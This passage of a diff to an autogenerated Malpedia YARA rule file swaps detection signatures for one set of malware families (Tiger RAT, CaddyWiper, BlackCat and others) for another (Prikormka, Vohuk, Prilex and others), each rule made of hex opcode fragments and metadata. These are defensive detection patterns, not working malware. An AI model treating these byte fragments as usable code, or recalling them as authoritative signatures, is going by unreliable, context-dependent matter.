-		7 of them and filesize < 393216
+		7 of them and filesize < 524288
 }
-rule MALPEDIA_Win_Tiger_Rat_Auto : FILE
+rule MALPEDIA_Win_Prikormka_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "67f423d7-2fad-5807-a6c5-0c99b540e781"
+		id = "2164d528-1794-5deb-b46c-b3d81c69fad8"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tiger_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tiger_rat_auto.yar#L1-L169"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.prikormka"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.prikormka_auto.yar#L1-L416"
 		license_url = "N/A"
-		logic_hash = "6751f9ead0a49726ec5dc792ec4931ab1c6ffa2fe50674026329e51b931ea082"
+		logic_hash = "6a6b4101990a4a459b0787e75e4b68bca1a92474214a272dc57d00cd454ce776"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -130510,38 +130943,68 @@ rule MALPEDIA_Win_Tiger_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4883c104 488bd0 488bd8 e8???????? }
-		$sequence_1 = { 4883c104 48895c2458 48894c2468 483bc8 }
-		$sequence_2 = { 410fb6df 48c1e802 48c1e004 4803c8 }
-		$sequence_3 = { 41bb80000000 0fb65415d4 41d3fb 4122d3 }
-		$sequence_4 = { 2bdf eb05 bb00000100 488b542440 488b4c2450 }
-		$sequence_5 = { 4883c002 85c9 75ec 85d2 7422 ffc3 }
-		$sequence_6 = { 0f842d010000 48833d????????00 0f841f010000 48833d????????00 0f8411010000 48833d????????00 0f8403010000 }
-		$sequence_7 = { 410fb6cf 0845d6 418bc2 48c1e807 480bc8 498bc3 4183e302 }
-		$sequence_8 = { 8905???????? e8???????? 8b05???????? 418bd6 0b05???????? }
-		$sequence_9 = { 0f8423fdffff 4863c7 458bc5 488d9530060000 4803d0 488b442448 488d0d821f0100 }
-		$sequence_10 = { 448d420a 8905???????? c744242014000000 ff15???????? }
-		$sequence_11 = { 4053 4883ec20 4883610800 488d0556d30000 c6411000 }
-		$sequence_12 = { 4c8bc3 33d2 488bc8 e8???????? 33c9 c705????????51000000 ff15???????? }
-		$sequence_13 = { e8???????? 4885c0 752f 488d0dbac80100 8bd7 }
-		$sequence_14 = { 483305???????? 488bcb 488905???????? ff15???????? 488d1571c10000 483305???????? 488bcb }
-		$sequence_15 = { 0f1f4000 0fb6440d07 48ffc1 324415f7 4883f90f 490f44ce }
+		$sequence_0 = { 8d0446 50 e8???????? 83c40c 6a00 56 }
+		$sequence_1 = { 8b2d???????? 85c0 7405 6a02 56 ffd5 }
+		$sequence_2 = { 8d1446 52 e8???????? 83c40c }
+		$sequence_3 = { 7420 68???????? ffd7 03c0 50 }
+		$sequence_4 = { e8???????? 8b1d???????? 83c40c 6a00 56 ffd3 }
+		$sequence_5 = { 6800020000 ff15???????? 68???????? ffd7 }
+		$sequence_6 = { 56 ffd3 85c0 7405 6a02 }
+		$sequence_7 = { 85c0 740e 68???????? 50 ff15???????? ffd0 }
+		$sequence_8 = { 6a00 ff15???????? 85c0 7502 59 }
+		$sequence_9 = { 7502 59 c3 50 ff15???????? }
+		$sequence_10 = { 7408 41 42 3bce }
+		$sequence_11 = { 83c40c 8d442404 50 ff15???????? 5e 85c0 }
+		$sequence_12 = { ff15???????? 0fb7c0 6683f805 7d09 b801000000 }
+		$sequence_13 = { c3 57 6a00 6a00 6a00 6a02 }
+		$sequence_14 = { 83ec08 68???????? ff15???????? 0fb7c0 }
+		$sequence_15 = { ff15???????? ffd0 c705????????01000000 c705????????01000000 }
+		$sequence_16 = { 5e 85c0 7414 c705????????01000000 }
+		$sequence_17 = { 3db7000000 750e 56 ff15???????? 33c0 5e }
+		$sequence_18 = { 6a00 6a00 ff15???????? 8bf0 ff15???????? 3db7000000 750e }
+		$sequence_19 = { 8b0d???????? 2bc2 8b15???????? d1f8 }
+		$sequence_20 = { 6685d2 75f5 2bce 8d1400 }
+		$sequence_21 = { 2bce 8d1400 52 d1f9 }
+		$sequence_22 = { d1f8 8d7102 8da42400000000 668b11 83c102 6685d2 }
+		$sequence_23 = { 8b35???????? 83c40c 68???????? ffd6 03c0 }
+		$sequence_24 = { 83c002 6685c9 75f5 2bc6 8d0c12 51 d1f8 }
+		$sequence_25 = { 50 e8???????? b8???????? 83c40c 8d5002 }
+		$sequence_26 = { 85c0 7409 6a02 68???????? }
+		$sequence_27 = { 83c40c 8d5002 668b08 83c002 6685c9 75f5 8b0d???????? }
+		$sequence_28 = { 75f5 2bc6 03d2 52 }
+		$sequence_29 = { 56 57 68???????? 33ff 57 57 ff15???????? }
+		$sequence_30 = { e8???????? 83c40c eb0d 6a00 6800020000 }
+		$sequence_31 = { 50 68???????? 57 ffd6 03c7 50 }
+		$sequence_32 = { 50 ff15???????? 0fb74c2416 0fb7542414 }
+		$sequence_33 = { 6685d2 75f5 8d1400 2bce 52 }
+		$sequence_34 = { 6685c9 75f5 2bc2 d1f8 8bd0 b8???????? }
+		$sequence_35 = { 6685c9 75f5 2bc2 b9???????? d1f8 8d7102 }
+		$sequence_36 = { b9???????? d1f8 8d7102 668b11 83c102 6685d2 75f5 }
+		$sequence_37 = { 8b3d???????? 85f6 7420 68???????? }
+		$sequence_38 = { b8???????? 8d7002 8da42400000000 668b08 83c002 }
+		$sequence_39 = { 8b1d???????? 83c40c 6a00 68???????? ffd3 8b3d???????? 85c0 }
+		$sequence_40 = { 52 ff7504 57 50 }
+		$sequence_41 = { 68???????? 57 ff16 8bf0 3bf3 0f8c5a020000 }
+		$sequence_42 = { 8bc6 5e c3 56 6a5c ff74240c }
+		$sequence_43 = { 395de8 7512 ff35???????? ff15???????? 891d???????? 8b4dfc 8b45e8 }
+		$sequence_44 = { 57 894594 894d98 3b450c 0f84ba000000 }
+		$sequence_45 = { c1e606 03348520100210 c745e401000000 33db 395e08 7536 }
 
 	condition:
-		7 of them and filesize < 557056
+		7 of them and filesize < 401408
 }
-rule MALPEDIA_Win_Hyperbro_Auto : FILE
+rule MALPEDIA_Win_Vohuk_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "928fd5bd-5df8-568b-aeb6-54067fcb6b3c"
+		id = "3b59df29-d94c-5e14-b293-d94b874e6f12"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperbro"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hyperbro_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vohuk"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.vohuk_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "8b88d94d4bfcc0d3fb17142bb489e5f64650c522e571881733fdf16c084eb88b"
+		logic_hash = "a782dfb427f32a7fe3f5e7a12676df6b8f0aca1f4f78c54f0e9a25741f4d58aa"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -130555,32 +131018,32 @@ rule MALPEDIA_Win_Hyperbro_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c404 6882000000 6a00 50 8903 e8???????? }
-		$sequence_1 = { d1f8 8d3410 83fe40 7f37 8bc3 8bd3 }
-		$sequence_2 = { 52 6a01 8d4c2414 51 50 c744241800000000 ff15???????? }
-		$sequence_3 = { 85c0 752f 8b4304 50 }
-		$sequence_4 = { 895014 8d442410 50 8d4c2424 51 6a00 }
-		$sequence_5 = { 7412 50 e8???????? 83c404 897e18 897e1c }
-		$sequence_6 = { 51 ff15???????? 56 ffd5 5f 5e 5d }
-		$sequence_7 = { 8bdd 2bde c744243000000000 0f84c2000000 }
-		$sequence_8 = { 3bd6 0f839b020000 8b442420 2bc6 83f803 }
-		$sequence_9 = { e8???????? 8b4724 50 e8???????? 8b4f20 51 e8???????? }
+		$sequence_0 = { be8d000000 8b45c4 83c30c 40 }
+		$sequence_1 = { ba4786ac2e 6a21 e8???????? 57 ffd0 8b0d???????? ba4786ac2e }
+		$sequence_2 = { e8???????? 6801000100 6a08 56 ffd0 8b0d???????? ba0decbfd2 }
+		$sequence_3 = { 8b857cfeffff 668985fcfeffff 8b8578feffff 668985fefeffff 8b8574feffff 66898500ffffff 8b8570feffff }
+		$sequence_4 = { 8b8570ffffff 668985ccfeffff b8b8000000 668985cefeffff 668985d2feffff 8b856cffffff 668985d4feffff }
+		$sequence_5 = { c745e49700c500 c745e882008200 c745ec86008000 c745f08f008f00 c745f4d600cd00 c745f8cb008300 c745fc8300f100 }
+		$sequence_6 = { 03c2 0fbec0 6bc073 040c 02c1 30440dd0 41 }
+		$sequence_7 = { 69c0f6000000 2bc8 81c1cc000000 66318c74ea000000 46 83fe27 72d1 }
+		$sequence_8 = { 6a22 e8???????? 68???????? 53 ffd0 8b7d90 8b7510 }
+		$sequence_9 = { 8bec 81ec5c080000 8d45a8 ba44000000 56 8bf1 c60000 }
 
 	condition:
-		7 of them and filesize < 352256
+		7 of them and filesize < 260096
 }
-rule MALPEDIA_Win_Darkpink_Auto : FILE
+rule MALPEDIA_Win_Lethic_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b675ae58-304b-51cc-82c9-2d05a952daf3"
+		id = "ecf699d4-037c-58b3-a572-a126b8291661"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkpink"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.darkpink_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lethic"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lethic_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "ae61fd7de2751bb38bc52ea4bef7ef6d5cc9562894ba78123146d52f1f8217ba"
+		logic_hash = "0a37e4703a880069257b89a7948a47634d1bc51105338bac97b952539891efa4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -130594,34 +131057,34 @@ rule MALPEDIA_Win_Darkpink_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f8579010000 8b35???????? 68a6000000 68???????? 6a01 50 }
-		$sequence_1 = { ffd3 85c0 7530 6a32 }
-		$sequence_2 = { c1f806 6bc938 8b0485f09d4100 0fb6440828 83e040 5d }
-		$sequence_3 = { c745e4a8604100 eb07 c745e494604100 8b4508 }
-		$sequence_4 = { 8b04bdf09d4100 ff743018 ff15???????? 85c0 7404 }
-		$sequence_5 = { 56 57 e8???????? 57 68???????? 53 }
-		$sequence_6 = { 85f6 7420 6bc618 57 8db8f09b4100 }
-		$sequence_7 = { 83e03f c1f906 6bd038 8b45fc 03148df09d4100 }
-		$sequence_8 = { 83e73f c1f906 6bd738 8b0c8df09d4100 c644112800 }
-		$sequence_9 = { 8bcf 83e03f c1f906 6bd038 8b45fc 03148df09d4100 }
+		$sequence_0 = { 83ec0c 8b4508 8945f4 6838100000 6a40 }
+		$sequence_1 = { 8b45f4 8b08 890a 8b55fc 8b02 8945fc 8b4df4 }
+		$sequence_2 = { 740a 8b45fc 8b08 894dfc }
+		$sequence_3 = { eb42 6a10 8b55fc 83c208 }
+		$sequence_4 = { 837df800 7418 8b45f8 50 8b4dfc }
+		$sequence_5 = { 7507 33c0 e9???????? 8b55f4 8b4218 50 8b4df8 }
+		$sequence_6 = { 7507 33c0 e9???????? 8b55f4 8b4218 }
+		$sequence_7 = { 8b45fc 8b4d10 894804 8b55fc c7823410000001000000 6a10 8b450c }
+		$sequence_8 = { ffd0 6a06 6a01 6a02 8b4df4 }
+		$sequence_9 = { 837df800 7418 8b45f8 50 8b4dfc 51 }
 
 	condition:
-		7 of them and filesize < 237568
+		7 of them and filesize < 81920
 }
-rule MALPEDIA_Win_Caddywiper_Auto : FILE
+rule MALPEDIA_Win_Ketrican_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a5109c69-dce6-5bdc-a837-95fd9e608c27"
+		id = "439971d8-746c-55ae-9bfc-c8ec84b9bdc0"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.caddywiper"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.caddywiper_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ketrican"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ketrican_auto.yar#L1-L232"
 		license_url = "N/A"
-		logic_hash = "e3d56965e8598d86c97b50c37aebd90c5841d385e5b67b4fcd4ffac110956cd1"
+		logic_hash = "bd65d425e881a2f25fb5439fad465d4c0696f8064b1ba4643c58eae4b61b8ee6"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -130633,32 +131096,45 @@ rule MALPEDIA_Win_Caddywiper_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c6852bffffff50 c6852cffffff72 c6852dffffff69 c6852effffff76 }
-		$sequence_1 = { c68523ffffff77 c68524ffffff6e c68525ffffff65 c68526ffffff72 c68527ffffff73 c68528ffffff68 c68529ffffff69 }
-		$sequence_2 = { ff954cf7ffff 8985e0f1ffff 83bde0f1ffffff 7505 e9???????? }
-		$sequence_3 = { c645f26c c645f300 c645f400 c645f500 c645d043 }
-		$sequence_4 = { c645c06b c645c165 c645c26e c645c350 c645c472 }
-		$sequence_5 = { 50 8d8db4fbffff 51 e8???????? 83c408 89854cf7ffff }
-		$sequence_6 = { 8b4df0 51 e8???????? 83c404 8945e8 837de800 0f84dc000000 }
-		$sequence_7 = { e8???????? 83c408 89854cffffff c745fc00000000 c68538ffffff43 c68539ffffff6c c6853affffff6f }
-		$sequence_8 = { c6852dffffff69 c6852effffff76 c6852fffffff69 c68530ffffff6c c68531ffffff65 c68532ffffff67 c68533ffffff65 }
-		$sequence_9 = { c645eb00 c645ec65 c645ed00 c645ee6c }
+		$sequence_0 = { 8965f0 33db 895dfc 33c0 }
+		$sequence_1 = { 8906 c3 56 8bf1 57 8bf8 }
+		$sequence_2 = { 7505 e8???????? 83c010 8906 c3 56 }
+		$sequence_3 = { 8bc1 8945f0 834dfcff e8???????? }
+		$sequence_4 = { 8901 5b 5d c20800 680e000780 }
+		$sequence_5 = { 8b06 5d c20400 55 8bec 8b4508 }
+		$sequence_6 = { cc 8b06 83e810 8b08 395008 7d13 85d2 }
+		$sequence_7 = { 680e000780 e8???????? cc 8b06 }
+		$sequence_8 = { 6a66 58 668945d8 6a72 58 668945da }
+		$sequence_9 = { e8???????? 8b7d0c 83c40c 8bc7 }
+		$sequence_10 = { 6a69 58 668945d4 6a65 58 668945d6 6a66 }
+		$sequence_11 = { 33ff 8bd8 897d0c 85db 7e13 }
+		$sequence_12 = { 6a01 e8???????? 59 59 e8???????? 8bf0 }
+		$sequence_13 = { 5e 5d c3 ff25???????? 6aff 50 }
+		$sequence_14 = { 668945e6 668945e8 33c0 668945ea c745ec08020000 }
+		$sequence_15 = { 0f840c000000 8365d4fe 8d4da4 e9???????? c3 8d4dbc e9???????? }
+		$sequence_16 = { 8d420c 8b4ae8 33c8 e8???????? 8b8a4c010000 33c8 }
+		$sequence_17 = { 68???????? c705????????98824100 a3???????? c605????????00 e8???????? 59 c3 }
+		$sequence_18 = { e8???????? 8b8a4c010000 33c8 e8???????? b8???????? e9???????? }
+		$sequence_19 = { 33c8 e8???????? 8b8a8c2f0000 33c8 e8???????? b8???????? e9???????? }
+		$sequence_20 = { 8b8a38ffffff 33c8 e8???????? 8b8ae8060000 }
+		$sequence_21 = { b8???????? e9???????? 8d45d0 e9???????? 8d4dd0 e9???????? 8d4de0 }
+		$sequence_22 = { e9???????? 8b4508 e9???????? 8b45ec }
 
 	condition:
-		7 of them and filesize < 33792
+		7 of them and filesize < 1449984
 }
-rule MALPEDIA_Win_Icexloader_Auto : FILE
+rule MALPEDIA_Win_Rook_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f39d0ab5-8213-59e6-b937-084e69d35431"
+		id = "f7d50ee5-0cf7-58f1-9491-c0b1413c9c03"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.icexloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.icexloader_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rook"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rook_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "ebc5d7149c8501657e5a8c66abb5a20df9b61fa7b96a5f5c2d43922a15f6b368"
+		logic_hash = "8ce4aaa97754380ef7f8444fbf7c6b6bdd739dd7cb13bc80ec0f235cec755f83"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -130672,32 +131148,32 @@ rule MALPEDIA_Win_Icexloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d47f8 e8???????? 8b4604 85c0 7408 83e808 e8???????? }
-		$sequence_1 = { 89d0 85c9 742d 8d51f8 3c02 7415 770e }
-		$sequence_2 = { 40 ebbd 8a0439 89c2 83e2df 80fa44 0f95c3 }
-		$sequence_3 = { 0fb605???????? 84c0 7505 e8???????? 8b4514 c70000000000 c745d800000000 }
-		$sequence_4 = { ebca 83c42c 89d8 5b 5e 5f 5d }
-		$sequence_5 = { 81ec8c010000 8b01 898dc0feffff 8b10 b8???????? 899594feffff e8???????? }
-		$sequence_6 = { c74424086c000000 e9???????? 891424 89ca 8d4de4 c744240400000000 e8???????? }
-		$sequence_7 = { c9 c20800 55 89e5 83ec28 d94508 8d4df4 }
-		$sequence_8 = { 8b17 83e33f c1f806 83cb80 83c8c0 885c3209 88443208 }
-		$sequence_9 = { 8b45dc 8b55d8 29d0 89c3 8b4508 8b5010 8b450c }
+		$sequence_0 = { eb07 488d1d1a030200 4883a4249800000000 4084f6 }
+		$sequence_1 = { 488b8da0260000 ff15???????? 4c8b85a0260000 33ff 48897c2438 448bc8 48897c2430 }
+		$sequence_2 = { 48897de0 e8???????? 85c0 0f8401010000 488d0507f00100 4a8b04e8 }
+		$sequence_3 = { 483d00100000 7324 0f1f00 486385f0070000 42c6042800 ff85f0070000 }
+		$sequence_4 = { 7631 0f1f840000000000 488d0c5b 48c1e104 4803cf f6410c02 7407 }
+		$sequence_5 = { 48630d???????? 488b05???????? 4c890cc8 488d0d4a640500 }
+		$sequence_6 = { 488d0d13b30000 488b45d8 488908 488d0dc5250200 }
+		$sequence_7 = { 488b0d???????? 4c8d4540 ba08000000 ff15???????? 488bd8 }
+		$sequence_8 = { 488d0d63410400 480f440d???????? 48890d???????? 488d0d6d2c0500 }
+		$sequence_9 = { 440f47e8 44896c2448 418d45ff 0fb68c82e2220400 0fb6b482e3220400 8bd9 8bf8 }
 
 	condition:
-		7 of them and filesize < 656384
+		7 of them and filesize < 843776
 }
-rule MALPEDIA_Win_Metastealer_Auto : FILE
+rule MALPEDIA_Win_Tabmsgsql_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "03175067-a9b5-54bf-936c-98a9cdf892a4"
+		id = "46efd2fa-703e-5a59-aba6-3e76ded2c28a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.metastealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.metastealer_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tabmsgsql"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tabmsgsql_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "88c2cf894d34c5f1940f86cdfe567315a89acface2e055dfbbf9e01110d9ea97"
+		logic_hash = "b7af53703ea2c2d22f99bfde61f6f08676ed98de77314180af9bbcb3621e1f8d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -130711,34 +131187,34 @@ rule MALPEDIA_Win_Metastealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff75a0 ff7704 ff37 e8???????? 8b4704 83c410 c78564ffffffffffff7f }
-		$sequence_1 = { f20f10c2 42 f20f5ec2 f20f5ac0 f30f11448e08 8b75c4 035d10 }
-		$sequence_2 = { e8???????? 84c0 752d 8b4508 8b4018 894508 85c0 }
-		$sequence_3 = { f30f5acb f30f5ac4 f20f590cce f20f58c8 f20f2dd1 81faff000000 760e }
-		$sequence_4 = { ff760c 68???????? 50 e8???????? 83c418 8bf8 c645fc07 }
-		$sequence_5 = { e8???????? 83c404 8945f4 85c0 0f84c0150000 8bc8 33d2 }
-		$sequence_6 = { ffd0 0fb78e48020000 83c41c 3bc1 7416 68???????? 53 }
-		$sequence_7 = { c78510f7ffff00000000 c78514f7ffff0000f03f e8???????? 68???????? 8d45a0 c7459800000000 50 }
-		$sequence_8 = { c74610b4000000 b92d000000 c74614bf000000 be???????? f3a5 68???????? c680b400000000 }
-		$sequence_9 = { f7472800008000 744e 8d8f88000000 85db 7506 46 8975fc }
+		$sequence_0 = { a1???????? 85c0 74e1 a1???????? 85c0 741a a1???????? }
+		$sequence_1 = { c3 8d560a 52 68???????? }
+		$sequence_2 = { 50 57 6a01 56 ff15???????? 8b442444 8b4c2448 }
+		$sequence_3 = { 8b6c2418 56 57 8b7c2418 33db 57 50 }
+		$sequence_4 = { 57 6a01 56 ff15???????? 8b442444 8b4c2448 03c7 }
+		$sequence_5 = { 25ffff0000 50 8b44242a 51 }
+		$sequence_6 = { 8b4508 53 6a01 50 b9???????? e8???????? }
+		$sequence_7 = { 8965f0 66ab 53 53 aa 8a4510 51 }
+		$sequence_8 = { 7d04 0430 eb02 0437 8801 }
+		$sequence_9 = { 5e 5d 5b 7421 8b8424f8f40100 8d4c2400 50 }
 
 	condition:
-		7 of them and filesize < 26230784
+		7 of them and filesize < 163840
 }
-rule MALPEDIA_Elf_Blackcat_Auto : FILE
+rule MALPEDIA_Win_Prilex_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a1fea123-6f91-5435-8619-28347a7f06ff"
+		id = "2ee73f8b-e8a7-530a-919c-0e8a3ae2ae98"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.blackcat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/elf.blackcat_auto.yar#L1-L111"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.prilex"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.prilex_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "630d3dc7c9122b8f92125090dcb7617ef29586df7b1f7e85bb11a06ca666eb4d"
-		score = 60
-		quality = 45
+		logic_hash = "6de539b63b8562d1b8bdbaceab1132bb64a8bf2aa0cf4524ffc6127b96beab6c"
+		score = 75
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -130750,32 +131226,32 @@ rule MALPEDIA_Elf_Blackcat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 81fa???????? 720d b805000000 81faffffff0f }
-		$sequence_1 = { 7227 b903000000 81fa???????? 721a }
-		$sequence_2 = { 81f9???????? 0f823fffffff b802000000 81f9???????? 0f822effffff }
-		$sequence_3 = { 0f823fffffff b802000000 81f9???????? 0f822effffff }
-		$sequence_4 = { 721a b804000000 81fa???????? 720d b805000000 81faffffff0f }
-		$sequence_5 = { b802000000 81f9???????? 7227 b803000000 81f9???????? 721a }
-		$sequence_6 = { 6685db 7404 660fbccb 0fb7c9 }
-		$sequence_7 = { 81fa???????? 721a b904000000 81fa???????? }
-		$sequence_8 = { 81f9???????? 0f823fffffff b802000000 81f9???????? }
-		$sequence_9 = { 0fb6c8 8d1489 8d0cd1 c1e90c 6bd164 28d0 }
+		$sequence_0 = { 2b4814 898de8feffff 8b55ac 8b85e8feffff 3b4210 730c }
+		$sequence_1 = { 8b45a0 8985b4feffff c745a000000000 8b8db4feffff 898d54ffffff }
+		$sequence_2 = { 6aff 52 895dbc e8???????? ffd6 }
+		$sequence_3 = { 0f8097000000 50 6a01 6a03 51 6a04 }
+		$sequence_4 = { 7405 e9???????? c745fc15000000 6a00 }
+		$sequence_5 = { 897db0 ff15???????? 50 8d45d8 50 ff15???????? 8bf0 }
+		$sequence_6 = { e8???????? 8bf8 ff15???????? 8d55d4 }
+		$sequence_7 = { 52 ff15???????? 50 8b4508 8b08 51 57 }
+		$sequence_8 = { ffd6 50 8d4da0 68???????? 51 ffd6 }
+		$sequence_9 = { ff15???????? 8b4d08 8b35???????? b808000000 }
 
 	condition:
-		7 of them and filesize < 8011776
+		7 of them and filesize < 450560
 }
-rule MALPEDIA_Win_Magala_Auto : FILE
+rule MALPEDIA_Win_Ismagent_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "dd5a4c9f-df80-534d-9f59-9c3cdf877b1e"
+		id = "24afa0f1-f712-53a2-912d-b18acc3ca8ea"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.magala"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.magala_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismagent"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ismagent_auto.yar#L1-L100"
 		license_url = "N/A"
-		logic_hash = "e8f124f03a02dce9fd7ad1355c64c37bef0ae56bc832afec7217c51b4b91da06"
+		logic_hash = "9ef409a40f890c9792a656e6f1a7b3222e5613b22517076da29bfdc0316f39e4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -130789,32 +131265,30 @@ rule MALPEDIA_Win_Magala_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bf8 c7461000000000 c746140f000000 c60600 837f1410 }
-		$sequence_1 = { 57 51 8bf9 c785e8feffff00000000 50 }
-		$sequence_2 = { 8b450c ff7508 03c3 03c2 50 8b4510 03c3 }
-		$sequence_3 = { 8bfb 8b75c4 85f6 7432 8b4dcc b853d9de75 2bce }
-		$sequence_4 = { 8985ecfdffff ff15???????? 8bf0 89b5f0fdffff 85f6 0f847f000000 }
-		$sequence_5 = { 8bf1 0f42f8 8b4e10 8bc1 f7d0 3bc7 0f86de000000 }
-		$sequence_6 = { 8bf0 3bfe 7445 8bcf e8???????? }
-		$sequence_7 = { e8???????? 8b06 83c408 5e 85c0 7510 68???????? }
-		$sequence_8 = { 0f1f440000 56 68???????? e8???????? }
-		$sequence_9 = { 8955fc 7202 8b00 837f1410 7204 8b0f eb02 }
+		$sequence_0 = { 89442448 8bf0 83c404 2bf2 }
+		$sequence_1 = { 2bce 3bd1 72e2 83ff04 750a }
+		$sequence_2 = { 5d c3 8b85b8f3ffff 33db 899dc0f3ffff c60000 85c9 }
+		$sequence_3 = { 8d4901 88840c1f130000 84c0 75ec 33c9 8a840c380f0000 }
+		$sequence_4 = { 8d5201 888c14ff060000 84c9 75ec }
+		$sequence_5 = { 8b4c2434 8d942418070000 50 6a01 }
+		$sequence_6 = { 8dbc2428650000 2bd6 4f 0f1f8000000000 8a4701 }
+		$sequence_7 = { 8d8424580b0000 50 e8???????? 83c40c 8d842418030000 68e8030000 50 }
 
 	condition:
-		7 of them and filesize < 589824
+		7 of them and filesize < 327680
 }
-rule MALPEDIA_Win_Knot_Auto : FILE
+rule MALPEDIA_Win_Saigon_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ea865775-0235-55b7-9748-11331945e645"
+		id = "67d61467-37a6-5772-94ec-e928f4e39175"
 		date = "2024-10-31"
